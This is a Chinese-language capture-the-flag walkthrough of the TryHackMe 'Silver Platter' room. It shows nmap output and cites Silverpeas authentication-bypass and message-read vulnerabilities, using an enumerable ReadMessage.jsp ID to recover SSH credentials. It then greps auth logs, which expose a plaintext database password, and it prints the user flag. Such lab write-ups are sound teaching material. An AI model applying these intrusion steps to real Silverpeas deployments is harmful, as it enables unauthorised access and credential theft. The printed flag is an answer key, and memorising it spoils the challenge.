THM-Silver Platter

本文最后更新于 2025年1月22日 晚上

Silver Platter

INTRO

1
2
3
4
5
Think you've got what it takes to outsmart the Hack Smarter Security team? They claim to be unbeatable, and now it's your chance to prove them wrong. Dive into their web server, find the hidden flags, and show the world your elite hacking skills. Good luck, and may the best hacker win!

But beware, this won't be a walk in the digital park. Hack Smarter Security has fortified the server against common attacks and their password policy requires passwords that have not been breached (they check it against the rockyou.txt wordlist - that's how 'cool' they are). The hacking gauntlet has been thrown, and it's time to elevate your game. Remember, only the most ingenious will rise to the top. 

May your code be swift, your exploits flawless, and victory yours!

nmap扫一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
└─$ nmap -T4 -A -v 10.10.175.68
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-22 21:10 CST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:10
Completed NSE at 21:10, 0.00s elapsed
Initiating NSE at 21:10
Completed NSE at 21:10, 0.00s elapsed
Initiating NSE at 21:10
Completed NSE at 21:10, 0.00s elapsed
Initiating Ping Scan at 21:10
Scanning 10.10.175.68 [4 ports]
Completed Ping Scan at 21:10, 0.68s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:10
Completed Parallel DNS resolution of 1 host. at 21:10, 0.03s elapsed
Initiating SYN Stealth Scan at 21:10
Scanning 10.10.175.68 [1000 ports]
Discovered open port 80/tcp on 10.10.175.68
Discovered open port 8080/tcp on 10.10.175.68
Discovered open port 22/tcp on 10.10.175.68
Completed SYN Stealth Scan at 21:11, 13.79s elapsed (1000 total ports)
Initiating Service scan at 21:11
Scanning 3 services on 10.10.175.68
Completed Service scan at 21:12, 109.44s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 10.10.175.68
Retrying OS detection (try #2) against 10.10.175.68
Retrying OS detection (try #3) against 10.10.175.68
Retrying OS detection (try #4) against 10.10.175.68
Retrying OS detection (try #5) against 10.10.175.68
Initiating Traceroute at 21:13
Completed Traceroute at 21:13, 0.60s elapsed
Initiating Parallel DNS resolution of 3 hosts. at 21:13
Completed Parallel DNS resolution of 3 hosts. at 21:13, 8.02s elapsed
NSE: Script scanning 10.10.175.68.
Initiating NSE at 21:13
Completed NSE at 21:13, 14.45s elapsed
Initiating NSE at 21:13
Completed NSE at 21:13, 2.30s elapsed
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
Nmap scan report for 10.10.175.68
Host is up (0.41s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 1b:1c:87:8a:fe:34:16:c9:f7:82:37:2b:10:8f:8b:f1 (ECDSA)
|_  256 26:6d:17:ed:83:9e:4f:2d:f6:cd:53:17:c8:80:3d:09 (ED25519)
80/tcp   open  http       nginx 1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD
|_http-title: Hack Smarter Security
|_http-server-header: nginx/1.18.0 (Ubuntu)
8080/tcp open  http-proxy
| fingerprint-strings:
|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, Socks5, TLSSessionReq, TerminalServerCookie, WMSRequest, oracle-tns:
|     HTTP/1.1 400 Bad Request
|     Content-Length: 0
|_    Connection: close
|_http-title: Error
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.95%I=7%D=1/22%Time=6790EE76%P=x86_64-pc-linux-gnu%r(RT
SF:SPRequest,42,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Length:\x20
SF:0\r\nConnection:\x20close\r\n\r\n")%r(Socks5,42,"HTTP/1\.1\x20400\x20Ba
SF:d\x20Request\r\nContent-Length:\x200\r\nConnection:\x20close\r\n\r\n")%
SF:r(GenericLines,42,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Length
SF::\x200\r\nConnection:\x20close\r\n\r\n")%r(Help,42,"HTTP/1\.1\x20400\x2
SF:0Bad\x20Request\r\nContent-Length:\x200\r\nConnection:\x20close\r\n\r\n
SF:")%r(SSLSessionReq,42,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Le
SF:ngth:\x200\r\nConnection:\x20close\r\n\r\n")%r(TerminalServerCookie,42,
SF:"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Length:\x200\r\nConnecti
SF:on:\x20close\r\n\r\n")%r(TLSSessionReq,42,"HTTP/1\.1\x20400\x20Bad\x20R
SF:equest\r\nContent-Length:\x200\r\nConnection:\x20close\r\n\r\n")%r(Kerb
SF:eros,42,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Length:\x200\r\n
SF:Connection:\x20close\r\n\r\n")%r(SMBProgNeg,42,"HTTP/1\.1\x20400\x20Bad
SF:\x20Request\r\nContent-Length:\x200\r\nConnection:\x20close\r\n\r\n")%r
SF:(LPDString,42,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Length:\x2
SF:00\r\nConnection:\x20close\r\n\r\n")%r(LDAPSearchReq,42,"HTTP/1\.1\x204
SF:00\x20Bad\x20Request\r\nContent-Length:\x200\r\nConnection:\x20close\r\
SF:n\r\n")%r(SIPOptions,42,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-
SF:Length:\x200\r\nConnection:\x20close\r\n\r\n")%r(WMSRequest,42,"HTTP/1\
SF:.1\x20400\x20Bad\x20Request\r\nContent-Length:\x200\r\nConnection:\x20c
SF:lose\r\n\r\n")%r(oracle-tns,42,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nC
SF:ontent-Length:\x200\r\nConnection:\x20close\r\n\r\n");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=1/22%OT=22%CT=1%CU=32857%PV=Y%DS=3%DC=T%G=Y%TM=6790EF0
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(SP=100%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=102%GCD=2%ISR=10E%TI=Z%
OS:CI=Z%II=I%TS=A)SEQ(SP=106%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=108%G
OS:CD=1%ISR=10A%TI=Z%CI=Z%TS=A)OPS(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT
OS:11NW7%O4=M508ST11NW7%O5=M508ST11NW7%O6=M508ST11)WIN(W1=F4B3%W2=F4B3%W3=F
OS:4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M508NNSNW7%CC=Y%Q
OS:=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%
OS:W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=
OS:)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=
OS:S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RU
OS:CK=6EF7%RUD=G)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=6F
OS:03%RUD=G)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=6F1D%RU
OS:D=G)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=6F27%RUD=G)U
OS:1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=6F41%RUD=G)IE(R=Y
OS:%DFI=N%T=40%CD=S)

Uptime guess: 45.766 days (since Sun Dec  8 02:50:52 2024)
Network Distance: 3 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   0.18 ms   bogon (172.17.16.1)
2   596.40 ms 10.8.0.1
3   596.60 ms 10.10.175.68

NSE: Script Post-scanning.
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 169.84 seconds
           Raw packets sent: 1460 (68.752KB) | Rcvd: 1095 (47.904KB)

22,80,8080三个端口

80端口可能有用的信息

1
如果您想与我们联系,请联系我们的 Silverpeas 项目经理。他的用户名是“scr1ptkiddy”。

8080端口是

1
404 - Not Found
1
Silverpeas 是一个开源的企业级协作平台,旨在为组织提供一整套用于工作流、内容管理、沟通和团队协作的工具。它是一个基于 Java 和 J2EE 技术栈构建的平台,具有高度可定制性,适合各种规模的组织使用。

范问:8080/silverpea

2025-01-22214929

可以看一下CVE-2024-36042,有个身份验证绕过,bp拦截重定向绕过登录到后台

搜索一下有个CVE/CVE-2023-47323 在主站点 ·RhinoSecurityLabs/CVE 漏洞,可以进行任意读取

简单的递推一下

1
/silverpeas/RSILVERMAIL/jsp/ReadMessage.jsp?ID=6

到这里有东西

1
2
3
4
5
Dude how do you always forget the SSH password? Use a password manager and quit using your silly sticky notes. 

Username: tim

Password: cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol

ssh登录一下

What is the user flag?

1
2
3
4
tim@silver-platter:~$ ls
user.txt
tim@silver-platter:~$ cat user.txt
THM{c4ca4238a0b923820dcc509a6f75849b}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
tim@silver-platter:~$ ls -al
total 12
dr-xr-xr-x 2 root root 4096 Dec 13  2023 .
drwxr-xr-x 4 root root 4096 Dec 13  2023 ..
-rw-r--r-- 1 root root   38 Dec 13  2023 user.txt
tim@silver-platter:~$ cd
tim@silver-platter:~$ cd ..
tim@silver-platter:/home$ ls
tim  tyler
tim@silver-platter:/home$ cd ..
tim@silver-platter:/$ ls
bin   dev  home  lib32  libx32      media  opt   root  sbin  srv  tmp  var
boot  etc  lib   lib64  lost+found  mnt    proc  run   snap  sys  usr
tim@silver-platter:/$ sudo -l
[sudo] password for tim:
Sorry, user tim may not run sudo on silver-platte

发现还有个user是tyler,查看一下日志

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
tim@silver-platter:/$ cd /var/log
tim@silver-platter:/var/log$ ls
alternatives.log    auth.log.2.gz                      dist-upgrade  dpkg.log       kern.log.1     syslog
alternatives.log.1  aws114_ssm_agent_installation.log  dmesg         dpkg.log.1     kern.log.2.gz  syslog.1
amazon              bootstrap.log                      dmesg.0       dpkg.log.2.gz  kern.log.3.gz  syslog.2.gz
apt                 btmp                               dmesg.1.gz    faillog        landscape      syslog.3.gz
auth.log            btmp.1                             dmesg.2.gz    installer      lastlog        ubuntu-advantage.log
auth.log.1          cloud-init.log                     dmesg.3.gz    journal        nginx          unattended-upgrades
auth.log.2          cloud-init-output.log              dmesg.4.gz    kern.log       private        wtmp
tim@silver-platter:/var/log$ cat /var/log/auth* | grep -ai -e 'tyler' -e 'pass' -e 'ssh'
Jan 22 13:11:02 silver-platter sshd[1638]: error: kex_exchange_identification: Connection closed by remote host
Jan 22 13:11:02 silver-platter sshd[1638]: Connection closed by 10.8.11.245 port 13952
Jan 22 13:13:21 silver-platter sshd[1873]: error: Protocol major versions differ: 2 vs. 1
Jan 22 13:13:21 silver-platter sshd[1873]: banner exchange: Connection from 10.8.11.245 port 13899: could not read protocol version
Jan 22 13:13:22 silver-platter sshd[1874]: error: Protocol major versions differ: 2 vs. 1
Jan 22 13:13:22 silver-platter sshd[1874]: banner exchange: Connection from 10.8.11.245 port 13939: could not read protocol version
Jan 22 13:13:25 silver-platter sshd[1875]: Unable to negotiate with 10.8.11.245 port 16096: no matching host key type found. Their offer: ssh-dss [preauth]
Jan 22 13:13:26 silver-platter sshd[1877]: Unable to negotiate with 10.8.11.245 port 16104: no matching host key type found. Their offer: ssh-rsa [preauth]
Jan 22 13:13:29 silver-platter sshd[1879]: Connection closed by 10.8.11.245 port 16120 [preauth]
Jan 22 13:13:31 silver-platter sshd[1881]: Unable to negotiate with 10.8.11.245 port 16128: no matching host key type found. Their offer: ecdsa-sha2-nistp384 [preauth]
Jan 22 13:13:32 silver-platter sshd[1883]: Unable to negotiate with 10.8.11.245 port 16030: no matching host key type found. Their offer: ecdsa-sha2-nistp521 [preauth]
Jan 22 13:13:34 silver-platter sshd[1885]: Connection closed by 10.8.11.245 port 13866 [preauth]
Jan 22 13:52:34 silver-platter sshd[2698]: Connection closed by authenticating user tim 10.8.11.245 port 16060 [preauth]
Jan 22 13:53:05 silver-platter sshd[2705]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.8.11.245  user=tim
Jan 22 13:53:07 silver-platter sshd[2705]: Failed password for tim from 10.8.11.245 port 16110 ssh2
Jan 22 13:53:30 silver-platter sshd[2705]: Failed password for tim from 10.8.11.245 port 16110 ssh2
Jan 22 13:54:08 silver-platter sshd[2705]: Accepted password for tim from 10.8.11.245 port 16110 ssh2
Jan 22 13:54:08 silver-platter sshd[2705]: pam_unix(sshd:session): session opened for user tim(uid=1001) by (uid=0)
May  8 08:58:40 silver-platter sshd[1710]: Accepted password for tyler from 192.168.1.20 port 42258 ssh2
May  8 08:58:40 silver-platter sshd[1710]: pam_unix(sshd:session): session opened for user tyler(uid=1000) by (uid=0)
May  8 08:58:40 silver-platter systemd-logind[711]: New session 2 of user tyler.
May  8 08:58:40 silver-platter systemd: pam_unix(systemd-user:session): session opened for user tyler(uid=1000) by (uid=0)
May  8 08:58:44 silver-platter sudo:    tyler : TTY=pts/0 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/bin/su
May  8 08:58:44 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
May  8 08:58:44 silver-platter su: pam_unix(su:session): session opened for user root(uid=0) by tyler(uid=0)
May  8 13:59:37 silver-platter sshd[737]: Server listening on 0.0.0.0 port 22.
May  8 13:59:37 silver-platter sshd[737]: Server listening on :: port 22.
May  8 14:00:53 silver-platter sshd[1946]: Accepted password for tyler from 192.168.1.20 port 55742 ssh2
May  8 14:00:53 silver-platter sshd[1946]: pam_unix(sshd:session): session opened for user tyler(uid=1000) by (uid=0)
May  8 14:00:53 silver-platter systemd-logind[709]: New session 2 of user tyler.
May  8 14:00:53 silver-platter systemd: pam_unix(systemd-user:session): session opened for user tyler(uid=1000) by (uid=0)
May  8 14:01:11 silver-platter sudo:    tyler : TTY=pts/0 ; PWD=/var/log ; USER=root ; COMMAND=/usr/bin/su
May  8 14:01:11 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
May  8 14:01:11 silver-platter su: pam_unix(su:session): session opened for user root(uid=0) by tyler(uid=0)
May  8 14:24:26 silver-platter sshd[777]: Server listening on 0.0.0.0 port 22.
May  8 14:24:26 silver-platter sshd[777]: Server listening on :: port 22.
Jan 22 13:09:55 silver-platter sshd[718]: Server listening on 0.0.0.0 port 22.
Jan 22 13:09:55 silver-platter sshd[718]: Server listening on :: port 22.
Dec 12 19:31:36 silver-platter useradd[674]: new group: name=tyler, GID=1000
Dec 12 19:31:36 silver-platter useradd[674]: new user: name=tyler, UID=1000, GID=1000, home=/home/tyler, shell=/bin/bash, from=none
Dec 12 19:31:36 silver-platter useradd[674]: add 'tyler' to group 'adm'
Dec 12 19:31:36 silver-platter useradd[674]: add 'tyler' to group 'cdrom'
Dec 12 19:31:36 silver-platter useradd[674]: add 'tyler' to group 'sudo'
Dec 12 19:31:36 silver-platter useradd[674]: add 'tyler' to group 'dip'
Dec 12 19:31:36 silver-platter useradd[674]: add 'tyler' to group 'plugdev'
Dec 12 19:31:36 silver-platter useradd[674]: add 'tyler' to group 'lxd'
Dec 12 19:31:36 silver-platter useradd[674]: add 'tyler' to shadow group 'adm'
Dec 12 19:31:36 silver-platter useradd[674]: add 'tyler' to shadow group 'cdrom'
Dec 12 19:31:36 silver-platter useradd[674]: add 'tyler' to shadow group 'sudo'
Dec 12 19:31:36 silver-platter useradd[674]: add 'tyler' to shadow group 'dip'
Dec 12 19:31:36 silver-platter useradd[674]: add 'tyler' to shadow group 'plugdev'
Dec 12 19:31:36 silver-platter useradd[674]: add 'tyler' to shadow group 'lxd'
Dec 12 19:31:37 silver-platter sshd[869]: Server listening on 0.0.0.0 port 22.
Dec 12 19:31:37 silver-platter sshd[869]: Server listening on :: port 22.
Dec 12 19:31:43 silver-platter sshd[869]: Received signal 15; terminating.
Dec 12 19:31:43 silver-platter sshd[1410]: Server listening on 0.0.0.0 port 22.
Dec 12 19:31:43 silver-platter sshd[1410]: Server listening on :: port 22.
Dec 12 19:32:17 silver-platter login[765]: pam_unix(login:auth): authentication failure; logname=LOGIN uid=0 euid=0 tty=/dev/tty1 ruser= rhost=  user=tyler
Dec 12 19:32:20 silver-platter login[765]: FAILED LOGIN (1) on '/dev/tty1' FOR 'tyler', Authentication failure
Dec 12 19:32:32 silver-platter login[765]: pam_unix(login:session): session opened for user tyler(uid=1000) by LOGIN(uid=0)
Dec 12 19:32:32 silver-platter systemd-logind[703]: New session 1 of user tyler.
Dec 12 19:32:32 silver-platter systemd: pam_unix(systemd-user:session): session opened for user tyler(uid=1000) by (uid=0)
Dec 12 19:34:33 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/sbin/useradd tim
Dec 12 19:34:33 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 12 19:34:40 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/passwd tim
Dec 12 19:34:40 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 12 19:34:46 silver-platter passwd[1576]: pam_unix(passwd:chauthtok): password changed for tim
Dec 12 19:35:03 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/sbin/usermod -aG adm tim
Dec 12 19:35:03 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 12 19:35:51 silver-platter sshd[722]: Server listening on 0.0.0.0 port 22.
Dec 12 19:35:51 silver-platter sshd[722]: Server listening on :: port 22.
Dec 12 19:36:10 silver-platter login[735]: pam_unix(login:session): session opened for user tyler(uid=1000) by LOGIN(uid=0)
Dec 12 19:36:10 silver-platter systemd-logind[694]: New session 1 of user tyler.
Dec 12 19:36:10 silver-platter systemd: pam_unix(systemd-user:session): session opened for user tyler(uid=1000) by (uid=0)
Dec 12 19:38:46 silver-platter sudo: pam_unix(sudo:auth): authentication failure; logname=tyler uid=1000 euid=0 tty=/dev/tty1 ruser=tyler rhost=  user=tyler
Dec 12 19:39:15 silver-platter sudo:    tyler : 3 incorrect password attempts ; TTY=tty1 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/bin/apt install nginx
Dec 12 19:39:25 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/bin/apt install nginx
Dec 12 19:39:25 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 12 19:39:42 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/bin/systemctl start nginx
Dec 12 19:39:42 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 12 19:39:47 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/bin/systemctl enable nginx
Dec 12 19:39:47 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 12 19:39:58 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/sbin/ufw allow 80
Dec 12 19:39:58 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 09:08:03 silver-platter sshd[709]: Server listening on 0.0.0.0 port 22.
Dec 13 09:08:03 silver-platter sshd[709]: Server listening on :: port 22.
Dec 13 09:08:18 silver-platter login[745]: pam_unix(login:session): session opened for user tyler(uid=1000) by LOGIN(uid=0)
Dec 13 09:08:18 silver-platter systemd-logind[698]: New session 1 of user tyler.
Dec 13 09:08:18 silver-platter systemd: pam_unix(systemd-user:session): session opened for user tyler(uid=1000) by (uid=0)
Dec 13 09:08:32 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/sbin/nginx
Dec 13 09:08:32 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 15:08:51 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/bin/systemctl start nginx
Dec 13 15:08:51 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 15:11:15 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/etc/nginx/sites-available ; USER=root ; COMMAND=/usr/bin/nano default
Dec 13 15:11:15 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 15:10:13 silver-platter sshd[739]: Server listening on 0.0.0.0 port 22.
Dec 13 15:10:13 silver-platter sshd[739]: Server listening on :: port 22.
Dec 13 15:10:28 silver-platter login[742]: pam_unix(login:session): session opened for user tyler(uid=1000) by LOGIN(uid=0)
Dec 13 15:10:28 silver-platter systemd-logind[700]: New session 1 of user tyler.
Dec 13 15:10:28 silver-platter systemd: pam_unix(systemd-user:session): session opened for user tyler(uid=1000) by (uid=0)
Dec 13 15:38:57 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/apt install docker.io
Dec 13 15:38:57 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 15:39:07 silver-platter usermod[1597]: change user 'dnsmasq' password
Dec 13 15:39:07 silver-platter chage[1604]: changed password expiry for dnsmasq
Dec 13 15:40:33 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name postgresql -d -e POSTGRES_PASSWORD=_Zd_zx7N823/ -v postgresql-data:/var/lib/postgresql/data postgres:12.3
Dec 13 15:40:33 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 15:41:17 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker exec -it postgresql psql -U postgres
Dec 13 15:41:17 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 15:44:30 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=_Zd_zx7N823/ -v silverpeas-log:/opt/silverpeas/log -v silverpeas-data:/opt/silvepeas/data --link postgresql:database sivlerpeas:silverpeas-6.3.1
Dec 13 15:44:30 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 15:45:21 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=_Zd_zx7N823/ -v silverpeas-log:/opt/silverpeas/log -v silverpeas-data:/opt/silvepeas/data --link postgresql:database silverpeas:silverpeas-6.3.1
Dec 13 15:45:21 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 15:45:57 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=_Zd_zx7N823/ -v silverpeas-log:/opt/silverpeas/log -v silverpeas-data:/opt/silvepeas/data --link postgresql:database silverpeas:6.3.1
Dec 13 15:45:57 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 15:50:38 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/sbin/ufw allow 8080
Dec 13 15:50:38 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 15:51:13 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker ps
Dec 13 15:51:13 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 15:53:35 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/bin/wget http://192.168.1.20/silverplatter.zip
Dec 13 15:53:35 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 15:53:44 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/bin/apt install unzip
Dec 13 15:53:44 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 15:53:55 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/bin/unzip silverplatter.zip
Dec 13 15:53:55 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 15:54:14 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/var/www/html/html5up-dimension ; USER=root ; COMMAND=/usr/bin/mv assets images index.html LICENSE.txt README.txt ../
Dec 13 15:54:14 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 15:54:39 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/bin/rm silverplatter.zip
Dec 13 15:54:39 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 15:54:45 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/bin/rm -rf html5up-dimension/
Dec 13 15:54:45 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 15:55:31 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/etc/nginx/sites-available ; USER=root ; COMMAND=/usr/bin/systemctl restart nginx
Dec 13 15:55:31 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 16:17:21 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/etc/nginx/sites-available ; USER=root ; COMMAND=/usr/bin/passwd tim
Dec 13 16:17:21 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 16:17:31 silver-platter passwd[6811]: pam_unix(passwd:chauthtok): password changed for tim
Dec 13 16:17:43 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/etc/nginx/sites-available ; USER=root ; COMMAND=/usr/sbin/ufw allow 22
Dec 13 16:17:43 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 16:18:10 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/etc/nginx/sites-available ; USER=root ; COMMAND=/usr/bin/systemctl ssh status
Dec 13 16:18:10 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
